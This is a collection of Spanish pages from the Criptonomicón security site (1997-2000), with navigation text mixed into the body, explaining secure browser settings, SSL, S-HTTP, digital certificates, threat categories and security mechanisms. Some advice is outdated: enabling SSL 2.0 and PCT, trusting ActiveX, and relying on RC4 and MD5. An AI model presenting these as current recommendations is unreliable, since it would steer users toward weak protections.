Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/pconexion.html [25/10/2000 02:31:17 p.m.]

Configuracin segura de Internet Explorer - Pestaa Programas

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Pestaa Programas
Ofrece la posibilidad de configurar qu programa de correo y
lector de noticias desea utilizar integrado con Internet Explorer.
Generalmente, al instalar la versin 4.x del navegador se instala
asimismo el cliente de correo Outlook Express, que aparecer
como predeterminado, de manera que en el futuro, cada vez que
enve correo desde Internet Explorer se har a travs del programa
que se haya especificado aqu.
Si no desea que sitios web obtengan inadvertidamente su
direccin de correo, como se discuti al hablar de la Identidad en
Netscape, debera configurar Outlook Express (o su cliente
preferido) con una cuenta falsa (en Outlook Express se hace en
Herramientas/Cuentas.../Pestaa Correo/Botn
Agregar/Correo...).

General
Seguridad
Contenido
Conexin
Programas
Opciones avanzadas

Por supuesto, resulta menos complicado leer las ventanas de aviso que se le
presentan mientras navega, ya que Internet Explorer (a diferencia de Netscape
Navigator, que lo hace desde las versiones 4.x en adelante) siempre le avisar antes
de enviar correo automticamente, en vez de enviar correos sin ton ni son.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/pprogramas.html [25/10/2000 02:31:17 p.m.]

Configuracin segura de Internet Explorer - Pestaa Opciones avanzadas

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Pestaa Opciones avanzadas


General
Conviene activar todas las casillas que aparecen bajo Seguridad:
Avisar si el envo de formularios cambia
Seguridad
de direccin, es decir, si la informacin rellenada en el
formulario se enva a un sitio web distinto del sitio que le
Contenido
present el formulario.
Conexin
SSL 2.0 y SSL 3.0, para especificar que desea enviar
y recibir informacin segura a travs de Secure Socket
Programas
Layer, versiones 2.0 y 3.0 respectivamente. Conviene
activar ambos.
Opciones avanzadas
Advertir sobre los certificados de sitio no vlidos,
cuando la direccin URL de un certificado de seguridad de un sitio de Internet
no sea vlida.
Advertir del cambio entre modalidad segura y no
segura, cuando se est moviendo entre sitios de Internet que no son seguros.
PCT 1.0, que especifica que desea enviar y recibir informacin segura a
travs de PCT (Private Communications Technology, Tecnologa privada de
comunicaciones), protocolo desarrollado por Microsoft y mucho ms seguro
que SSL 2.0. Puede activarse sin problemas.
Al igual que en Netscape, por defecto las cookies se aceptan sin avisar. En esta
opcin se le ofrece la posibilidad de bloquearlas todas o avisar antes de
aceptarlas. Se aplican los mismos comentarios y consejos que se vieron para
Netscape al hablar de cookies.
Buscar revocacin de certificado, con el fin de que Internet
Explorer compruebe el certificado de un sitio para ver si se ha revocado antes
de aceptarlo como vlido.
No guardar las pginas a disco, que hace que la informacin
segura no se guarde en el disco duro. Slo se recomienda si est utilizando
Internet Explorer desde un servidor compartido y no desea que otras personas
vean su informacin segura.
Eliminar las pginas guardadas cuando se cierre el

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/pavanzadas.html (1 of 2) [25/10/2000 02:31:17 p.m.]

Configuracin segura de Internet Explorer - Pestaa Opciones avanzadas

explorador, que permite borrar el contenido de la carpeta Archivos


temporales de Internet cuando cierra el explorador. Slo se
recomienda si le preocupa el problema del cache, como se discuti ms arriba.
Si desea que Internet Explorer cree un registro de toda la actividad de Java, active la
casilla de verificacin Consola Java activada. Esta opcin le resultar muy
til en el caso de que una applet maliciosa ocasione algn desperfecto en su sistema,
ya que le permitir rastrear sus acciones.
Las mismas reflexiones que se hicieron con respecto a los plug-in en Netscape, se
pueden aplicar al caso de Internet Explorer.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/pavanzadas.html (2 of 2) [25/10/2000 02:31:17 p.m.]

Cmo estar seguro de un servidor seguro

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Cmo estar seguro de un servidor seguro


Introduccin
Aunque nuestros datos viajen cifrados por la Red, si los estamos
enviando a (los recibimos de) un impostor, no saldremos mucho
SSL
mejor parados. Se hace imprescindible el contar con un
S-HTTP
mecanismo que d fe de si un servidor seguro es quien creemos
SSL vs S-HTTP
que es y podemos confiar en l a la hora de transmitirle nuestra
Certificados
informacin. La forma como se hace es mediante las Autoridades
Cmo obterner uno
de Certificacin (AC), conocidas informalmente como notarios
electrnicos, encargadas de autenticar a los participantes en transacciones y
comunicaciones a travs de la Red. Su funcin es emitir certificados a los usuarios,
de manera que se pueda estar seguro de que el interlocutor (cliente o servidor) es
quien pretende ser, garantizando as la seguridad de las transacciones.

El certificado de seguridad se concede a una entidad despus de comprobar una serie


de referencias, para asegurar la identidad del receptor de los datos cifrados. Se
construye a partir de la clave pblica del servidor solicitante, junto con algunos datos
bsicos del mismo y es firmado por la autoridad de certificacin correspondiente con
su clave privada. Para aprender ms sobre certificados y autoridades de certificacin,
visite la pgina de Verisign.
En la prctica, sabremos que el servidor es seguro porque en nuestro navegador
veremos una llave
o un candado cerrado en la parte izquierda, si usamos
Netscape, o bien un candado cerrado en la parte derecha , si usamos el Explorer.
Advertencia: Una llave entera o un candado cerrado no garantizan una
comunicacin segura. Es necesario comprobar el certificado.
Otro cambio importante es el identificador de protocolo en la URL, que vara
ligeramente: ya no empieza con http, sino con https.

Correo seguro

Proyecto piloto
Web seguro

Susurros desde la Cripta

Puedes acceder a nuestro proyecto piloto de autoridad de certificacin y ver todos los
conceptos anteriores en funcionamiento.

file:///C|/TEMP/criptonomicon/criptonomicon/certificados.html (1 of 2) [25/10/2000 02:31:18 p.m.]

Cmo estar seguro de un servidor seguro


Consejos prcticos

Referencias

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Libro de Visitas

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/certificados.html (2 of 2) [25/10/2000 02:31:18 p.m.]

Secure Socket Layer (SSL)

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Secure Socket Layer (SSL)

JavaScript

Introduccin
El protocolo SSL es un sistema diseado y propuesto por
Netscape Communications Corporation. Se encuentra en la pila
SSL
OSI entre los niveles de TCP/IP y de los protocolos HTTP, FTP,
S-HTTP
SMTP, etc. Proporciona sus servicios de seguridad cifrando los
SSL vs S-HTTP
datos intercambiados entre el servidor y el cliente con un
Certificados
algoritmo de cifrado simtrico, tpicamente el RC4 o IDEA, y
Cmo obterner uno
cifrando la clave de sesin de RC4 o IDEA mediante un algoritmo
de cifrado de clave pblica, tpicamente el RSA. La clave de sesin es la que se
utiliza para cifrar los datos que vienen del y van al servidor seguro. Se genera una
clave de sesin distinta para cada transaccin, lo cual permite que aunque sea
reventada por un atacante en una transaccin dada, no sirva para descifrar futuras
transacciones. MD5 se usa como algoritmo de hash.

Cookies

Proporciona cifrado de datos, autenticacin de servidores, integridad de mensajes y,


opcionalmente, autenticacin de cliente para conexiones TCP/IP.

Linux

Navegacin segura

Control de acceso

CGI

Java

Crashes

Agujeros

Cuando el cliente pide al servidor seguro una comunicacin segura, el servidor abre
un puerto cifrado, gestionado por un software llamado Protocolo SSL Record,
situado encima de TCP. Ser el software de alto nivel, Protocolo SSL Handshake,
quien utilice el Protocolo SSL Record y el puerto abierto para comunicarse de forma
segura con el cliente.

Spam

El Protocolo SSL Handshake


Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Durante el protocolo SSL Handshake, el cliente y el servidor intercambian una serie


de mensajes para negociar las mejoras de seguridad. Este protocolo sigue las
siguientes seis fases (de manera muy resumida):
La fase Hola, usada para ponerse de acuerdo sobre el conjunto de algoritmos
para mantener la intimidad y para la autenticacin.
La fase de intercambio de claves, en la que intercambia informacin sobre las
claves, de modo que al final ambas partes comparten una clave maestra.
La fase de produccin de clave de sesin, que ser la usada para cifrar los
datos intercambiados.

file:///C|/TEMP/criptonomicon/criptonomicon/ssl.html (1 of 2) [25/10/2000 02:31:18 p.m.]

Secure Socket Layer (SSL)


Consejos prcticos

Referencias

Libro de Visitas

La fase de verificacin del servidor, presente slo cuando se usa RSA como
algoritmo de intercambio de claves, y sirve para que el cliente autentique al
servidor.
La fase de autenticacin del cliente, en la que el servidor solicita al cliente un
certificado X.509 (si es necesaria la autenticacin de cliente).
Por ltimo, la fase de fin, que indica que ya se puede comenzar la sesin
segura.

El Protocolo SSL Record


El Protocolo SSL Record especifica la forma de encapsular los datos transmitidos y
recibidos. La porcin de datos del protocolo tiene tres componentes:
MAC-DATA, el cdigo de autenticacin del mensaje.
ACTUAL-DATA, los datos de aplicacin a transmitir.
PADDING-DATA, los datos requeridos para rellenar el mensaje cuando se usa
cifrado en bloque.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/ssl.html (2 of 2) [25/10/2000 02:31:18 p.m.]

Secure HyperText Transfer Protocol (S-HTTP)

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Secure HyperText Transfer Protocol


(S-HTTP)
El protocolo S-HTTP fue desarrollado por Enterprise Integration
Technologies (EIT). Al igual que SSL, permite tanto el cifrado
como la autenticacin digital. Sin embargo, a diferencia de SSL,
S-HTTP es un protocolo de nivel de aplicacin, es decir, que
extiende el protocolo HTTP por debajo.
La propuesta de S-HTTP sugiere una nueva extensin para los
documentos, .shttp, y el siguiente nuevo protocolo:

Introduccin
SSL
S-HTTP
SSL vs S-HTTP
Certificados
Cmo obterner uno

Java

Secure * Secure-HTTP/1.1
JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Usando GET, un cliente solicita un documento, le dice al servidor qu tipo de cifrado


puede manejar y le dice tambin dnde puede encontrar su clave pblica. Si el
usuario con esa clave est autorizado a acceder al documento, el servidor responde
cifrando el documento y envindoselo al cliente, que usar su clave secreta para
descifrarlo y mostrrselo al usuario.
Las negociaciones entre el cliente y el servidor tienen lugar intercambiando datos
formateados. Estos datos incluyen una variedad de opciones de seguridad y
algoritmos a utilizar. Las lneas usadas en las cabeceras incluyen:
Dominios privados S-HTTP, que especifica la clase de algoritmos de cifrado
as como la forma de encapsulamiento de los datos (PEM o PKCS-7).
Tipos de certificado S-HTTP, que especifica el formato de certificado
aceptable, actualmente X.509.
Algoritmos de intercambio de clave S-HTTP, que indica los algoritmos que se
usarn para el intercambio de claves (RSA, fuera de bando, dentro de banda y
Krb).
Algoritmos de firmas S-HTTP, que especifica el algoritmo para la firma digital
(RSA o NIST-DSS).
Algoritmos de resumen de mensaje S-HTTP, que identifica el algoritmo para
proporcionar la integridad de los datos usando funciones de hash (RSA-MD2,
RSA-MD5 o NIST-SHS).

file:///C|/TEMP/criptonomicon/criptonomicon/shttp.html (1 of 2) [25/10/2000 02:31:18 p.m.]

Secure HyperText Transfer Protocol (S-HTTP)


Consejos prcticos

Referencias

Libro de Visitas

Algoritmos de contenido simtrico S-HTTP, que especifica el algoritmo


simtrico de cifrado en bloque usado para cifrar los datos:
DES-CBC
DES-EDE-CBC
DES-EDE3-CBC
DESX-CBC
IDEA-CFB
RC2-CBC
RC4
CDMF
Algoritmos de cabecera simtrica de S-HTTP, que proporciona una lista del
cifrado de clave simtrica utilizada para cifrar las cabeceras.
DES-ECB
DES-EDE-ECB
DES-EDE3-ECB
DESX-ECB
IDEA-ECB
RC2-ECB
CDMF-ECB
Mejoras de la intimidad de S-HTTP, que especifica las mejoras en la intimidad
asociadas con los mensajes, como firmar, cifrar o autenticar.

Uno de los mtodos de cifrado disponible en S-HTTP es el popular PGP.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/shttp.html (2 of 2) [25/10/2000 02:31:18 p.m.]

SSL vs. S-HTTP

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

SSL vs. S-HTTP


S-HTTP y SSL utilizan aproximaciones distintas con el fin de
proporcionar servicios de seguridad a los usuarios de la Red. SSL
ejecuta un protocolo de negociacin para establecer una conexin
segura a nivel de socket (nombre de mquina ms puerto). Los
servicios de seguridad de SSL son transparentes al usuario y a la
aplicacin.

Introduccin
SSL
S-HTTP
SSL vs S-HTTP
Certificados
Cmo obterner uno

Por su parte, los protocolos S-HTTP estn integrados con HTTP. Aqu, los servicios
de seguridad se negocian a travs de las cabeceras y atributos de la pgina. Por lo
tanto, los servicios de S-HTTP estn disponibles slo para las conexiones de HTTP.
Dado que SSL se integra en la capa de sockets, tambin permite ser usado por otros
protocolos adems del HTTP, mientras que el S-HTTP est concebido para ser usado
exclusivamente en comuniciones HTTP.

Cookies

Crashes
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/sslvsshttp.html (1 of 2) [25/10/2000 02:31:19 p.m.]

SSL vs. S-HTTP


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/sslvsshttp.html (2 of 2) [25/10/2000 02:31:19 p.m.]

Web Seguro - Cmo obtener un certificado digital

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Introduccin

A continuacin veremos cmo obtener certificados digitales para


utilizarlos con el Outlook o con NetscapeMessenger, con el fin de
enviar y recibir correos cifrados y/o firmados. Ah van los pasos
que hay que seguir, explicados de manera sencilla para todos.

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

SSL
S-HTTP
SSL vs S-HTTP
Certificados

Cmo obtener uno


Es importante notar que necesitas solicitar el certificado a una
autoridad de certificacin. En esta demostracin, se lo solicitaremos a VeriSign, lder
mundial en el mercado. Debes seguir los siguientes pasos:
1. Conctate al centro de identificadores digitales de VeriSign en
digitalid.verisign.com

2. Selecciona Personal IDs.


3. Pulsa el botn Enroll Now.
4. Selecciona el identificador Class 1 Digital ID, que te permitirenviar y
recibir correo cifrado. Para seguir adelante necesitas contar con una direccin
de correo vlida, ya que este certificado quedar ligado a ella.
5. Rellena cuidadosamente los campos del formulario. Si no deseas pagar, puedes
obtener un certificado de 60 das de validez. Asegratede que la conexin es
segura (que el candado en la barra de estado est cerrado). Puedes verificar la
identidad del sitio Web al que ests enviando tus datos personales pinchando
en el candado, que en Netscape Communicator aparecer en la parte izquierda
de la barra de estado, mientras que en Internet Explorer aparecer en el centro
de la barra de estado. Cuando hayas terminado, pulsa el botn Accept.
6. A continuacin el navegador generar su pareja de claves pblica y privada.
En el caso de que ests utilizando Internet Explorer, debers permitir la
ejecucin de controles ActiveX. No te preocupes que en este caso no hay
peligro.
7. Cuando el proceso anterior termina, se te conduce a una pgina donde se te
informa que debes comprobar tu correo en busca de instrucciones acerca de
cmo conseguir tu certificado. Esta informacin consiste en la direccin URL
de una pgina Web y un PIN.
8. Cuando recibas el citado correo, utiliza el mismo ordenador y el mismo
navegador para conectarte a esa URL e introduce el PIN si es que no se lee
automticamente (depender del cliente de correo queutilices).

file:///C|/TEMP/criptonomicon/criptonomicon/obtenercert.html (1 of 2) [25/10/2000 02:31:19 p.m.]

Web Seguro - Cmo obtener un certificado digital


Consejos prcticos

Referencias

Libro de Visitas

9. El navegador te guiar a travs del proceso de instalacin de tu certificado, que


podrs verificar en la ventana de Informacin sobreSeguridad, en el apartado
de Certificados->Propios (Netscape) o en Ver->Opciones de
Internet->Contenido->Certificados->Personal (InternetExplorer).
No debes preocuparte por el navegador que utilizas, ya que en funcin de si usas
Netscape Communicator o Internet Explorer, VeriSign te guiar automticamente a
unas pginas u otras.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/obtenercert.html (2 of 2) [25/10/2000 02:31:19 p.m.]

Servicios de seguridad

Suscripcin gratis

Intimidad?

Servicios de seguridad

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Introduccin

Para hacer frente a las amenazas a la seguridad del sistema se


Amenazas a la
seguridad
definen una serie de servicios para proteger los sistemas de
Servicios de
proceso de datos y de transferencia de informacin de una
seguridad
organizacin. Estos servicios hacen uso de uno o varios
Mecanismos de
mecanismos de seguridad. Una clasificacin til de los servicios
seguridad
de seguridad es la siguiente:
Gestin de claves
Confidencialidad: requiere que la informacin sea
accesible nicamente por las entidades autorizadas. La confidencialidad de
datos se aplica a todos los datos intercambiados por las entidades autorizadas o
tal vez a slo porciones o segmentos seleccionados de los datos, por ejemplo
mediante cifrado. La confidencialidad de flujo de trfico protege la identidad
del origen y destino(s) del mensaje, por ejemplo enviando los datos
confidenciales a muchos destinos adems del verdadero, as como el volumen
y el momento de trfico intercambiado, por ejemplo produciendo una cantidad
de trfico constante al aadir trfico espurio al significativo, de forma que sean
indistinguibles para un intruso. La desventaja de estos mtodos es que
incrementan drsticamente el volumen de trfico intercambiado, repercutiendo
negativamente en la disponibilidad del ancho de banda bajo demanda.
Autenticacin: requiere una identificacin correcta del origen del mensaje,
asegurando que la entidad no es falsa. Se distinguen dos tipos: de entidad, que
asegura la identidad de las entidades participantes en la comunicacin,
mediante biomtrica (huellas dactilares, identificacin de iris, etc.), tarjetas de
banda magntica, contraseas, o procedimientos similares; y de origen de
informacin, que asegura que una unidad de informacin proviene de cierta
entidad, siendo la firma digital el mecanismo ms extendido.
Integridad: requiere que la informacin slo pueda ser modificada por las
entidades autorizadas. La modificacin incluye escritura, cambio, borrado,
creacin y reactuacin de los mensajes transmitidos. La integridad de datos
asegura que los datos recibidos no han sido modificados de ninguna manera,
por ejemplo mediante un hash criptogrfico con firma, mientras que la
integridad de secuencia de datos asegura que la secuencia de los bloques o
unidades de datos recibidas no ha sido alterada y que no hay unidades
repetidas o perdidas, por ejemplo mediante time-stamps.
No repudio: ofrece proteccin a un usuario frente a que otro usuario niegue
posteriormente que en realidad se realiz cierta comunicacin. Esta proteccin

file:///C|/TEMP/criptonomicon/criptonomicon/servicio.html (1 of 2) [25/10/2000 02:31:19 p.m.]

Servicios de seguridad
Consejos prcticos

Referencias

Libro de Visitas

se efecta por medio de una coleccin de evidencias irrefutables que


permitirn la resolucin de cualquier disputa. El no repudio de origen protege
al receptor de que el emisor niegue haber enviado el mensaje, mientras que el
no repudio de recepcin protege al emisor de que el receptor niegue haber
recibido el mensaje. Las firmas digitales constituyen el mecanismo ms
empleado para este fin.
Control de acceso: requiere que el acceso a los recursos (informacin,
capacidad de clculo, nodos de comunicaciones, entidades fsicas, etc.) sea
controlado y limitado por el sistema destino, mediante el uso de contraseas o
llaves hardware, por ejemplo, protegindolos frente a usos no autorizados o
manipulacin.
Disponibilidad: requiere que los recursos del sistema informtico estn
disponibles a las entidades autorizadas cuando los necesiten.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/servicio.html (2 of 2) [25/10/2000 02:31:19 p.m.]

Amenazas deliberadas a la seguridad de la informacin

Suscripcin gratis

Intimidad?

Artculos

Amenazas deliberadas a la seguridad de


la informacin
Introduccin

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Se entiende por amenaza una condicin del entorno del sistema de


informacin (persona, mquina, suceso o idea) que, dada una
oportunidad, podra dar lugar a que se produjese una violacin de
la seguridad (confidencialidad, integridad, disponibilidad o uso
legtimo). La poltica de seguridad y el anlisis de riesgos habrn
identificado las amenazas que han de ser contrarrestadas,
dependiendo del diseador del sistema de seguridad especificar
los servicios y mecanismos de seguridad necesarios.

Mecanismos de
seguridad
Gestin de claves

Las cuatro categoras generales de amenazas o ataques son las siguientes (v. Figura):

Agujeros

Spam

Remailers

Correo seguro

Web seguro

Susurros desde la Cripta

Servicios de
seguridad

Las amenazas a la seguridad en una red pueden caracterizarse modelando el sistema


como un flujo de informacin desde una fuente, como por ejemplo un fichero o una
regin de la memoria principal, a un destino, como por ejemplo otro fichero o un
usuario. Un ataque no es ms que la realizacin de una amenaza.

Crashes

Anonimato

Amenazas a la
seguridad

Interrupcin: un recurso del sistema es destruido o se vuelve no disponible.


Este es un ataque contra la disponibilidad. Ejemplos de este ataque son la
destruccin de un elemento hardware, como un disco duro, cortar una lnea de
comunicacin o deshabilitar el sistema de gestin de ficheros.
Intercepcin: una entidad no autorizada consigue acceso a un recurso. Este es
un ataque contra la confidencialidad. La entidad no autorizada podra ser una
persona, un programa o un ordenador. Ejemplos de este ataque son pinchar
una lnea para hacerse con datos que circulen por la red y la copia ilcita de
ficheros o programas (intercepcin de datos), o bien la lectura de las cabeceras
de paquetes para desvelar la identidad de uno o ms de los usuarios implicados
en la comunicacin observada ilegalmente (intercepcin de identidad).
Modificacin: una entidad no autorizada no slo consigue acceder a un
recurso, sino que es capaz de manipularlo. Este es un ataque contra la
integridad. Ejemplos de este ataque son el cambio de valores en un archivo de
datos, alterar un programa para que funcione de forma diferente y modificar el
contenido de mensajes que estn siendo transferidos por la red.
Fabricacin: una entidad no autorizada inserta objetos falsificados en el
sistema. Este es un ataque contra la autenticidad. Ejemplos de este ataque son
la insercin de mensajes espurios en una red o aadir registros a un archivo.

file:///C|/TEMP/criptonomicon/criptonomicon/amenazas.html (1 of 3) [25/10/2000 02:31:20 p.m.]

Amenazas deliberadas a la seguridad de la informacin


Consejos prcticos

Referencias

Libro de Visitas

Estos ataques se pueden asimismo clasificar de forma til en trminos de ataques


pasivos y ataques activos.

Ataques pasivos
En los ataques pasivos el atacante no altera la comunicacin, sino que nicamente la
escucha o monitoriza, para obtener informacin que est siendo transmitida. Sus
objetivos son la intercepcin de datos y el anlisis de trfico, una tcnica ms sutil
para obtener informacin de la comunicacin, que puede consistir en:
Obtencin del origen y destinatario de la comunicacin, leyendo las
cabeceras de los paquetes monitorizados.
Control del volumen de trfico intercambiado entre las entidades
monitorizadas, obteniendo as informacin acerca de actividad o inactividad
inusuales.
Control de las horas habituales de intercambio de datos entre las entidades
de la comunicacin, para extraer informacin acerca de los perodos de
actividad.
Los ataques pasivos son muy difciles de detectar, ya que no provocan ninguna
alteracin de los datos. Sin embargo, es posible evitar su xito mediante el cifrado de
la informacin y otros mecanismos que se vern ms adelante.

Ataques activos
Estos ataques implican algn tipo de modificacin del flujo de datos transmitido o la
creacin de un falso flujo de datos, pudiendo subdividirse en cuatro categoras:
Suplantacin de identidad: el intruso se hace pasar por una entidad diferente.
Normalmente incluye alguna de las otras formas de ataque activo. Por
ejemplo, secuencias de autenticacin pueden ser capturadas y repetidas,
permitiendo a una entidad no autorizada acceder a una serie de recursos
privilegiados suplantando a la entidad que posee esos privilegios, como al
robar la contrasea de acceso a una cuenta.
Reactuacin: uno o varios mensajes legtimos son capturados y repetidos para
producir un efecto no deseado, como por ejemplo ingresar dinero repetidas
veces en una cuenta dada.
Modificacin de mensajes: una porcin del mensaje legtimo es alterada, o
los mensajes son retardados o reordenados, para producir un efecto no
autorizado. Por ejemplo, el mensaje Ingresa un milln de pesetas en la cuenta
A podra ser modificado para decir Ingresa un milln de pesetas en la cuenta
B.
Degradacin fraudulenta del servicio: impide o inhibe el uso normal o la
gestin de recursos informticos y de comunicaciones. Por ejemplo, el intruso
podra suprimir todos los mensajes dirigidos a una determinada entidad o se
podra interrumpir el servicio de una red inundndola con mensajes espurios.
Entre estos ataques se encuentran los de denegacin de servicio, consistentes
file:///C|/TEMP/criptonomicon/criptonomicon/amenazas.html (2 of 3) [25/10/2000 02:31:20 p.m.]

Amenazas deliberadas a la seguridad de la informacin

en paralizar temporalmente el servicio de un servidor de correo, Web, FTP,


etc.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/amenazas.html (3 of 3) [25/10/2000 02:31:20 p.m.]

Mecanismos de seguridad

Suscripcin gratis

Intimidad?

Mecanismos de seguridad

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Introduccin

No existe un nico mecanismo capaz de proveer todos los


Amenazas a la
seguridad
servicios anteriormente citados, pero la mayora de ellos hacen
Servicios de
uso de tcnicas criptogrficas basadas en el cifrado de la
seguridad
informacin. Los ms importantes son los siguientes:
Mecanismos de
Intercambio de autenticacin: corrobora que una entidad,
seguridad
ya sea origen o destino de la informacin, es la deseada, por Gestin de claves
ejemplo, A enva un nmero aleatorio cifrado con la clave
pblica de B, B lo descifra con su clave privada y se lo reenva a A,
demostrando as que es quien pretende ser. Por supuesto, hay que ser
cuidadoso a la hora de disear estos protocolos, ya que existen ataques para
desbaratarlos.
Cifrado: garantiza que la informacin no es inteligible para individuos,
entidades o procesos no autorizados (confidencialidad). Consiste en
transformar un texto en claro mediante un proceso de cifrado en un texto
cifrado, gracias a una informacin secreta o clave de cifrado. Cuando se
emplea la misma clave en las operaciones de cifrado y descifrado, se dice que
el criptosistema es simtrico. Estos sistemas son mucho ms rpidos que los de
clave pblica, resultando apropiados para funciones de cifrado de grandes
volmenes de datos. Se pueden dividir en dos categoras: cifradores de bloque,
que cifran los datos en bloques de tamao fijo (tpicamente bloques de 64
bits), y cifradores en flujo, que trabajan sobre flujos continuos de bits. Cuando
se utiliza una pareja de claves para separar los procesos de cifrado y
descifrado, se dice que el criptosistema es asimtrico o de clave pblica. Una
clave, la privada, se mantiene secreta, mientras que la segunda clave, la
pblica, puede ser conocida por todos. De forma general, las claves pblicas se
utilizan para cifrar y las privadas, para descifrar. El sistema tiene la propiedad
de que a partir del conocimiento de la clave pblica no es posible determinar la
clave privada. Los criptosistemas de clave pblica, aunque ms lentos que los
simtricos, resultan adecuados para las funciones de autenticacin,
distribucin de claves y firmas digitales.
Integridad de datos: este mecanismo implica el cifrado de una cadena
comprimida de datos a transmitir, llamada generalmente valor de
comprobacin de integridad (Integrity Check Value o ICV). Este mensaje se
enva al receptor junto con los datos ordinarios. El receptor repite la
compresin y el cifrado posterior de los datos y compara el resultado obtenido

file:///C|/TEMP/criptonomicon/criptonomicon/mecanism.html (1 of 2) [25/10/2000 02:31:21 p.m.]

Mecanismos de seguridad
Consejos prcticos

Referencias

Libro de Visitas

con el que le llega, para verificar que los datos no han sido modificados.
Firma digital: este mecanismo implica el cifrado, por medio de la clave
secreta del emisor, de una cadena comprimida de datos que se va a transferir.
La firma digital se enva junto con los datos ordinarios. Este mensaje se
procesa en el receptor, para verificar su integridad. Juega un papel esencial en
el servicio de no repudio.
Control de acceso: esfuerzo para que slo aquellos usuarios autorizados
accedan a los recursos del sistema o a la red, como por ejemplo mediante las
contraseas de acceso.
Trfico de relleno: consiste en enviar trfico espurio junto con los datos
vlidos para que el atacante no sepa si se est enviando informacin, ni qu
cantidad de datos tiles se est transmitiendo.
Control de encaminamiento: permite enviar determinada informacin por
determinadas zonas consideradas clasificadas. Asimismo posibilita solicitar
otras rutas, en caso que se detecten persistentes violaciones de integridad en
una ruta determinada.
Unicidad: consiste en aadir a los datos un nmero de secuencia, la fecha y
hora, un nmero aleatorio, o alguna combinacin de los anteriores, que se
incluyen en la firma digital o integridad de datos. De esta forma se evitan
amenazas como la reactuacin o resecuenciacin de mensajes.

Los mecanismos bsicos pueden agruparse de varias formas para proporcionar los
